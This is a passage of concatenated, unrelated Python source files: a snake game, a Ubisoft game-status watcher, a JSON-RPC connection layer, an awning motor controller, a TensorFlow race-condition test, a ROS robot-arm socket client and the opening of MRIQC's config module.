name = os.path.join(directory, base)
if os.path.isdir(name):
if not os.path.islink(name):
stack.append(name)
else:
if name.endswith(clipExtension):
name = os.path.relpath(name, clipDir)
(name, ext) = os.path.splitext(name)
if len(tasks) > 0 and (lastdir != directory or len(tasks) == tasksPerProc):
q.put(tasks)
tasks = []
lastdir = directory
tasks.append(name)
q.join()
|
snake.py | """
Juego de la serpiente
"""
from turtle import update, ontimer, setup, hideturtle, tracer, listen, onkey, \
done, clear
from random import randrange, choice
from freegames import square, vector
from playsound import playsound
from threading import Thread
food = vector(0, 0)
snake = [vector(10, 0)]
aim = vector(0, -10)
def musica():
playsound('musicaF.mid')
def colores():
colores=["red","black","yellow","orange"]
def change(x, y):
"Change snake direction."
aim.x = x
aim.y = y
def inside(head):
"Return True if head inside boundaries."
return -200 < head.x < 190 and -200 < head.y < 190
def move():
"Move snake forward one segment."
head = snake[-1].copy()
head.move(aim)
if not inside(head) or head in snake:
square(head.x, head.y, 9, 'red')
update()
return
snake.append(head)
if head == food:
print('Snake:', len(snake))
food.x = randrange(-15, 15) * 10
food.y = randrange(-15, 15) * 10
else:
snake.pop(0)
clear()
for body in snake:
square(body.x, body.y, 9, 'black')
square(food.x, food.y, 9, 'green')
update()
ontimer(move, 100)
music = Thread(target=musica)
music.daemon = True
music.start()
setup(420, 420, 370, 0)
hideturtle()
tracer(False)
listen()
onkey(lambda: change(10, 0), 'Right')
onkey(lambda: change(-10, 0), 'Left')
onkey(lambda: change(0, 10), 'Up')
onkey(lambda: change(0, -10), 'Down')
move()
done()
|
local_game_status.py | import time
import logging as log
import re
from file_read_backwards import FileReadBackwards
from threading import Thread
import psutil as psutil
from definitions import UbisoftGame, GameType, GameStatus, ProcessType, WatchedProcess, SYSTEM, System
from steam import get_steam_game_status
from local_helper import get_local_game_path, get_game_installed_status
class ProcessWatcher(object):
def __init__(self):
self.watched_processes = []
def watch_process(self, proces, game=None):
try:
process = WatchedProcess(
process=proces,
timeout=time.time() + 30,
type=ProcessType.Game if game else ProcessType.Launcher,
game=game if game else None,
)
self.watched_processes.append(process)
return process
except:
return None
def update_watched_processes_list(self):
try:
for proc in self.watched_processes:
if not proc.process.is_running():
log.info(f"Removing {proc}")
self.watched_processes.remove(proc)
except Exception as e:
log.error(f"Error removing process from watched processes list {repr(e)}")
class GameStatusNotifier(object):
def __init__(self, process_watcher):
self.process_watcher = process_watcher
self.games = {}
self.watchers = {}
self.statuses = {}
self.launcher_log_path = None
self._legacy_game_launched = False
if SYSTEM == System.WINDOWS:
Thread(target=self._process_data, daemon=True).start()
def update_game(self, game: UbisoftGame):
if game.install_id in self.watchers:
if game.path == self.watchers[game.install_id].path:
return
self.games[game.install_id] = game
def _is_process_alive(self, game):
try:
self.process_watcher.update_watched_processes_list()
for process in self.process_watcher.watched_processes:
if process.type == ProcessType.Game:
if process.game.install_id == game.install_id:
return True
return False
except Exception as e:
log.error(f"Error checking if process is alive {repr(e)}")
return False
def _get_process_by_path(self, game: UbisoftGame):
for p in psutil.process_iter(attrs=['exe'], ad_value=''):
if game.path.lower() in p.info['exe'].lower():
try:
if p.parent() and p.parent().exe() == game.path:
return p.parent().pid
return p.pid
except (psutil.AccessDenied, psutil.NoSuchProcess):
pass
def _handle_legacy_game_log(self, game):
if self._legacy_game_launched:
pid = self._get_process_by_path(game)
if pid:
self.process_watcher.watch_process(psutil.Process(int(pid)), game)
self._legacy_game_launched = False
return True
else:
return False
else:
# test if Legacy Game is still running
return self._is_process_alive(game)
def _read_log_data(self, game, log_line):
if "disconnected" in log_line:
return False
if "has been started with product id" in log_line and f' {game.launch_id} (' in log_line:
pid = int(re.search('Game with process id ([-+]?[0-9]+) has been started', log_line).group(1))
if pid:
self.process_watcher.watch_process(psutil.Process(pid), game)
return True
# only when clicked PLAY on Legacy game
if game.type == GameType.Legacy:
if "Failed to fetch club game. Missing space id" in log_line:
return self._handle_legacy_game_log(game)
def _parse_log(self, game, line_list):
if line_list:
try:
line = len(line_list) - 1
while line > 0:
game_status = self._read_log_data(game, line_list[line])
if game_status is not None:
return game_status
line = line - 1
return False
except Exception as e:
log.error(f"Error parsing launcher log file is game running {repr(e)}")
return False
else:
return False
def _is_game_running(self, game, line_list):
try:
if game.launch_id in self.statuses:
if self.statuses[game.launch_id] == GameStatus.Running:
return self._is_process_alive(game)
else:
return self._parse_log(game, line_list)
else:
return False
except Exception as e:
log.error(f"Error in checking is game running {line_list} {game.launch_id} / {repr(e)}")
def _get_launcher_log_lines(self, number_of_lines):
line_list = []
if self.launcher_log_path:
try:
with FileReadBackwards(self.launcher_log_path, encoding="utf-8") as fh:
[line_list.append(fh.readline()) for _ in range(number_of_lines)]
except FileNotFoundError:
pass
except UnicodeDecodeError:
log.warning(
f"Can't read launcher log at {self.launcher_log_path}, UnicodeDecodeError when reading log lines")
except Exception as e:
log.warning(
f"Can't read launcher log at {self.launcher_log_path}, unable to read running games statuses: {repr(e)}")
return line_list[::-1]
def _get_game_status(self, game, line_list):
status = None
if game.type == GameType.Steam:
status = get_steam_game_status(game.path)
else:
if not game.path:
game.path = get_local_game_path(game.special_registry_path, game.launch_id)
status = get_game_installed_status(game.path, game.exe, game.special_registry_path)
if status == GameStatus.Installed:
if self._is_game_running(game, line_list):
status = GameStatus.Running
return status
def _process_data(self):
statuses = self.statuses
while True:
line_list = self._get_launcher_log_lines(20)
if line_list:
try:
for install_id, game in self.games.items():
statuses[install_id] = self._get_game_status(game, line_list)
except Exception as e:
log.error(f"Process data error {repr(e)}")
self.statuses = statuses
time.sleep(1)
|
jsonrpc.py | import json
import logging
try:
import Queue
except ImportError:
import queue as Queue
import threading
from collections import deque
log = logging.getLogger(__name__)
class JSONRPC2ProtocolError(Exception):
pass
class ReadWriter:
def __init__(self, reader, writer):
self.reader = reader
self.writer = writer
def readline(self, *args):
data = self.reader.readline(*args)
return data.decode("utf-8")
def read(self, *args):
data = self.reader.read(*args)
return data.decode("utf-8")
def write(self, out):
self.writer.write(out.encode())
self.writer.flush()
class TCPReadWriter(ReadWriter):
def readline(self, *args):
data = self.reader.readline(*args)
return data.decode("utf-8")
def read(self, *args):
return self.reader.read(*args).decode("utf-8")
def write(self, out):
self.writer.write(out.encode())
self.writer.flush()
class JSONRPC2Connection:
def __init__(self, conn=None):
self.conn = conn
self._msg_buffer = deque()
self._next_id = 1
def _read_header_content_length(self, line):
if len(line) < 2 or line[-2:] != "\r\n":
raise JSONRPC2ProtocolError("Line endings must be \\r\\n")
if line.startswith("Content-Length: "):
_, value = line.split("Content-Length: ")
value = value.strip()
try:
return int(value)
except ValueError:
raise JSONRPC2ProtocolError(
"Invalid Content-Length header: {0}".format(value))
def _receive(self):
line = self.conn.readline()
if line == "":
raise EOFError()
length = self._read_header_content_length(line)
# Keep reading headers until we find the sentinel
# line for the JSON request.
while line != "\r\n":
line = self.conn.readline()
body = self.conn.read(length)
log.debug("RECV %s", body)
return json.loads(body)
def read_message(self, want=None):
"""Read a JSON RPC message sent over the current connection. If
id is None, the next available message is returned."""
if want is None:
if self._msg_buffer:
return self._msg_buffer.popleft()
return self._receive()
# First check if our buffer contains something we want.
msg = deque_find_and_pop(self._msg_buffer, want)
if msg:
return msg
# We need to keep receiving until we find something we want.
# Things we don't want are put into the buffer for future callers.
while True:
msg = self._receive()
if want(msg):
return msg
self._msg_buffer.append(msg)
def _send(self, body):
body = json.dumps(body, separators=(",", ":"))
content_length = len(body)
response = (
"Content-Length: {0}\r\n"
"Content-Type: application/vscode-jsonrpc; charset=utf8\r\n\r\n"
"{1}".format(content_length, body))
self.conn.write(response)
log.debug("SEND %s", body)
def write_response(self, rid, result):
body = {
"jsonrpc": "2.0",
"id": rid,
"result": result,
}
self._send(body)
def write_error(self, rid, code, message, data=None):
e = {
"code": code,
"message": message,
}
if data is not None:
e["data"] = data
body = {
"jsonrpc": "2.0",
"id": rid,
"error": e,
}
self._send(body)
def send_request(self, method, params):
rid = self._next_id
self._next_id += 1
body = {
"jsonrpc": "2.0",
"id": rid,
"method": method,
"params": params,
}
self._send(body)
return self.read_message(want=lambda msg: msg.get("id") == rid)
def send_notification(self, method, params):
body = {
"jsonrpc": "2.0",
"method": method,
"params": params,
}
self._send(body)
def send_request_batch(self, requests):
"""Pipelines requests and returns responses.
The responses is a generator where the nth response corresponds
with the nth request. Users must read the generator until the end,
otherwise you will leak a thread."""
# We communicate the request ids using a thread safe queue.
# It also allows us to bound the number of concurrent requests.
q = Queue.Queue(100)
def send():
for method, params in requests:
rid = self._next_id
self._next_id += 1
q.put(rid)
body = {
"jsonrpc": "2.0",
"id": rid,
"method": method,
"params": params,
}
self._send(body)
# Sentinel value to indicate we are done
q.put(None)
threading.Thread(target=send).start()
while True:
rid = q.get()
if rid is None:
break
yield self.read_message(want=lambda msg: msg.get("id") == rid)
def deque_find_and_pop(d, f):
idx = None
for i, v in enumerate(d):
if f(v):
idx = i
break
if idx is None:
return None
d.rotate(-idx)
v = d.popleft()
d.rotate(idx)
return v
def write_rpc_request(rid, method, params):
body = {
"jsonrpc": "2.0",
"id": rid,
"method": method,
"params": params,
}
body = json.dumps(body, separators=(",", ":"))
content_length = len(body)
return (
"Content-Length: {0}\r\n"
"Content-Type: application/vscode-jsonrpc; charset=utf8\r\n\r\n"
"{1}".format(content_length, body))
def write_rpc_notification(method, params):
body = {
"jsonrpc": "2.0",
"method": method,
"params": params,
}
body = json.dumps(body, separators=(",", ":"))
content_length = len(body)
return (
"Content-Length: {0}\r\n"
"Content-Type: application/vscode-jsonrpc; charset=utf8\r\n\r\n"
"{1}".format(content_length, body))
def read_rpc_messages(content):
def read_header_content_length(line):
if len(line) < 2 or line[-2:] != "\r\n":
raise JSONRPC2ProtocolError("Line endings must be \\r\\n")
if line.startswith("Content-Length: "):
_, value = line.split("Content-Length: ")
value = value.strip()
try:
return int(value)
except ValueError:
raise JSONRPC2ProtocolError(
"Invalid Content-Length header: {0}".format(value))
def receive_next():
line = content.readline()
if line == "":
raise EOFError()
length = read_header_content_length(line)
# Keep reading headers until we find the sentinel line
# for the JSON request.
while line != "\r\n":
line = content.readline()
body = content.read(length)
# log.debug("RECV %s", body)
return json.loads(body)
#
result_list = []
while(True):
try:
result = receive_next()
except EOFError:
break
else:
result_list.append(result)
return result_list
|
awning.py | import logging
import sys
import time
from datetime import datetime
from abc import ABC, abstractmethod
from threading import Thread, Lock
class Motor(ABC):
@abstractmethod
def stop(self):
pass
@abstractmethod
def backward(self):
pass
@abstractmethod
def forward(self):
pass
@property
@abstractmethod
def name(self) -> str:
pass
@property
@abstractmethod
def sec_per_step(self) -> float:
pass
class AwningPropertyListener:
def on_current_pos_updated(self, current_position: int):
pass
def on_retracting_updated(self, retracting: bool):
pass
def on_extenting_updated(self, extenting: bool):
pass
class Movement:
SLOT_TOLERANCE = 7
def __init__(self, motor: Motor, start_pos: int, num_slots: int, sec_per_slot: float, is_positive: bool, awning):
self.start_time = datetime.now()
self.awning = awning
self.motor = motor
self.start_pos = start_pos
self.num_slots = num_slots
self.sec_per_slot = sec_per_slot
if is_positive:
self.direction = 1
else:
self.direction = -1
def get_pause_sec(self):
return 0.5
def get_current_pos(self) -> int:
if self.is_target_reached():
return self.get_target_pos()
else:
return self.start_pos + (self.__get_num_processed_slots() * self.direction)
def get_target_pos(self) -> int:
return self.start_pos + (self.num_slots * self.direction)
def is_target_reached(self) -> bool:
return self.__get_num_processed_slots() >= self.num_slots
def __get_num_processed_slots(self) -> int:
elapsed_sec = (datetime.now() - self.start_time).total_seconds()
num_processed = 0
if elapsed_sec > 1:
num_processed = elapsed_sec / self.sec_per_slot
return int(num_processed)
def process(self):
if self.is_target_reached():
return Idling(self.motor, self.get_target_pos(), self.sec_per_slot, self.awning)
else:
self.awning.listener.on_current_pos_updated(self.get_current_pos())
return self
def drive_to(self, new_position: int):
if new_position > 100:
new_position = 100
elif new_position < 0:
new_position = 0
return self.__create_movement(int(new_position))
def __create_movement(self, new_position: int):
current_pos = self.get_current_pos()
if (new_position - current_pos) > self.SLOT_TOLERANCE:
return Forward(self.motor, current_pos, new_position, self.sec_per_slot, self.awning)
elif (current_pos - new_position) > self.SLOT_TOLERANCE:
return Backward(self.motor, current_pos, new_position, self.sec_per_slot, self.awning)
else:
return Idling(self.motor, current_pos, self.sec_per_slot, self.awning)
class Idling(Movement):
def __init__(self, motor: Motor, start_pos: int, sec_per_slot: float, awning):
Movement.__init__(self, motor, start_pos, 0, sec_per_slot, True, awning)
self.motor.stop()
self.awning.listener.on_extenting_updated(False)
self.awning.listener.on_retracting_updated(False)
def get_pause_sec(self):
pause_sec = int(self.SLOT_TOLERANCE * self.sec_per_slot * 1.4)
if pause_sec < 3:
pause_sec = 3
return pause_sec
def process(self):
return self # do nothing
class Forward(Movement):
def __init__(self, motor: Motor, start_pos: int, new_position: int, sec_per_slot: float, awning):
Movement.__init__(self, motor, start_pos, new_position - start_pos, sec_per_slot, True, awning)
self.motor.forward()
self.awning.listener.on_extenting_updated(True)
self.awning.listener.on_retracting_updated(False)
class Backward(Movement):
def __init__(self, motor: Motor, start_pos: int, new_position: int, sec_per_slot: float, awning):
Movement.__init__(self, motor, start_pos, start_pos - new_position, sec_per_slot, False, awning)
self.motor.backward()
self.awning.listener.on_retracting_updated(True)
self.awning.listener.on_extenting_updated(False)
class Awning:
PERIODIC_CALIBRATE_ON_HOUR = 3
PERIODIC_CALIBRATE_ON_MINUTE = 10
def __init__(self, motor: Motor):
self.sec_per_slot = motor.sec_per_step
self.listener = AwningPropertyListener()
self.motor = motor
self.__lock = Lock()
self.movement = Idling(self.motor, 0, self.sec_per_slot, self)
self.set_target_position(0)
Thread(name=self.name + "_move", target=self.__process_move, daemon=False).start()
Thread(target=self.__periodic_calibrate, daemon=True).start()
@property
def name(self) -> str:
return self.motor.name
def __periodic_calibrate(self):
time.sleep(60)
self.calibrate()
already_scheduled = False
while True:
now = datetime.now()
if self.PERIODIC_CALIBRATE_ON_HOUR <= now.hour < (self.PERIODIC_CALIBRATE_ON_HOUR + 1) and now.minute >= self.PERIODIC_CALIBRATE_ON_MINUTE:
if not already_scheduled:
self.calibrate()
already_scheduled = True
else:
already_scheduled = False
time.sleep(10 * 60)
def register_listener(self, listener: AwningPropertyListener):
self.listener = listener
def calibrate(self):
saved_target_pos = self.get_target_position()
logging.info("calibrating")
self.movement = Idling(self.motor, 100, self.sec_per_slot, self) # set position to 100%
self.set_target_position(0) # and backward to position 0. This ensures that the awning is calibrated with position 0
# wait until completed
for i in range (0, 60):
if self.is_target_reached():
break
else:
time.sleep(5)
if self.get_current_position() != saved_target_pos:
logging.info("move to previous target position " + str(saved_target_pos))
self.set_target_position(saved_target_pos)
def is_target_reached(self) -> bool:
return self.movement.is_target_reached()
def get_current_position(self) -> int:
return self.movement.get_current_pos()
def get_target_position(self) -> int:
return self.movement.get_target_pos()
def set_target_position(self, new_position: int):
with self.__lock:
self.movement = self.movement.drive_to(new_position)
def __process_move(self):
while True:
with self.__lock:
try:
self.movement = self.movement.process()
except:
self.movement = Idling(self.motor, 0, self.sec_per_slot, self)
logging.warning('move operation failed ' + str(sys.exc_info()))
finally:
pause_sec = self.movement.get_pause_sec()
time.sleep(pause_sec)
|
dense_update_ops_no_tsan_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
# NOTE(mrry): We exclude thess tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(array_ops.zeros([1024, 1024]))
adds = [
state_ops.assign_add(
p, ones_t, use_locking=False) for _ in range(20)
]
variables.global_variables_initializer().run()
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
with self.cached_session() as sess:
ones_t = array_ops.fill([1024, 1024], float(1))
p = variables.Variable(array_ops.zeros([1024, 1024]))
assigns = [
state_ops.assign(p, math_ops.multiply(ones_t, float(i)), False)
for i in range(1, 21)
]
variables.global_variables_initializer().run()
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
# NOTE(skyewm): We exclude these tests from the TSAN TAP target, because they
# contain non-benign but known data races between the variable assignment and
# returning the output tensors. This issue will be resolved with the new
# resource variables.
def testParallelUpdateWithLocking(self):
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
adds = [
state_ops.assign_add(
p, ones_t, use_locking=True) for _ in range(20)
]
p.initializer.run()
def run_add(add_op):
self.evaluate(add_op)
threads = [
self.checkedThread(
target=run_add, args=(add_op,)) for add_op in adds
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertAllEqual(vals, ones * 20)
def testParallelAssignWithLocking(self):
with self.cached_session() as sess:
zeros_t = array_ops.fill([1024, 1024], 0.0)
ones_t = array_ops.fill([1024, 1024], 1.0)
p = variables.Variable(zeros_t)
assigns = [
state_ops.assign(
p, math_ops.multiply(ones_t, float(i)), use_locking=True)
for i in range(1, 21)
]
p.initializer.run()
def run_assign(assign_op):
self.evaluate(assign_op)
threads = [
self.checkedThread(
target=run_assign, args=(assign_op,)) for assign_op in assigns
]
for t in threads:
t.start()
for t in threads:
t.join()
vals = self.evaluate(p)
# Assert every element is the same, and taken from one of the assignments.
self.assertTrue(vals[0, 0] > 0)
self.assertTrue(vals[0, 0] <= 20)
self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
if __name__ == "__main__":
test.main()
|
Hiwin_RT605_ArmCommand_Socket_20190627160417.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
point_data_flag = True
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
#Socket_command()
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
#print(2222222222)
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
#print(111111111111)
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join() |
config.py | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <nipreps@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
r"""
A Python module to maintain unique, run-wide *MRIQC* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<output_dir>/sub-<participant_id>/log/<run_unique_id>/mriqc.toml``.
Settings are stored using :abbr:`ToML (Tom's Markup Language)`.
The module has a :py:func:`~mriqc.config.to_filename` function to allow writting out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../mriqc/data/config-example.toml
:language: toml
:name: mriqc.toml
:caption: **Example file representation of MRIQC settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~mriqc.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from mriqc import config
config_file = mktemp(dir=config.execution.work_dir, prefix='.mriqc.', suffix='.toml')
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other conveniency actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Set up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
import sys
from pathlib import Path
from time import strftime
from uuid import uuid4
try:
# This option is only available with Python 3.8
from importlib.metadata import version as get_version
except ImportError:
from importlib_metadata import version as get_version
# Ignore annoying warnings
from mriqc._warnings import logging
__version__ = get_version("mriqc")
_pre_exec_env = dict(os.environ)
# Reduce numpy's vms by limiting OMP_NUM_THREADS
_default_omp_threads = int(os.getenv("OMP_NUM_THREADS", os.cpu_count()))
# Disable NiPype etelemetry always
_disable_et = bool(
os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None
)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
if not hasattr(sys, "_is_pytest_session"):
